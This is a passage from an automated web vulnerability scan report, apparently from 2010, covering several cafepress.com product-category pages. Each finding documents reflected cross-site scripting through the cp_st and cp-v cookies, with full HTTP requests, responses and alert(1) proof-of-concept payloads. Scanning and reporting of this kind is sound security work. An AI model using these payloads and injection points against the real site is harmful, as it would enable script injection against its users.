__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 56880 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 56880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.51. http://www.cafepress.com/+mousepads [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+mousepads
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6760</script><script>alert(1)</script>1c00c257e15 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mousepads HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a6760</script><script>alert(1)</script>1c00c257e15 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 56907 Date: Sun, 26 Dec 2010 13:48:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/ Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 56907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'a6760</script><script>alert(1)</script>1c00c257e15 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.52. http://www.cafepress.com/+mugs [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+mugs
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49177"-alert(1)-"acf862ea6e2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 60103 Date: Sun, 26 Dec 2010 13:47:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/ Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60103 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.53. http://www.cafepress.com/+mugs [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+mugs
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6774f</script><script>alert(1)</script>147c0c0a55c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=6774f</script><script>alert(1)</script>147c0c0a55c ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 60125 Date: Sun, 26 Dec 2010 13:47:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60125 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '6774f</script><script>alert(1)</script>147c0c0a55c ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.54. http://www.cafepress.com/+ornaments [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+ornaments
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40a17"-alert(1)-"1b71678a13 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59006 Date: Sun, 26 Dec 2010 13:49:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59006 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.55. http://www.cafepress.com/+ornaments [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+ornaments
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65868</script><script>alert(1)</script>67d717b073a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=65868</script><script>alert(1)</script>67d717b073a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 59029 Date: Sun, 26 Dec 2010 13:49:00 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59029 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '65868</script><script>alert(1)</script>67d717b073a ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.56. http://www.cafepress.com/+posters [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+posters
Issue detail
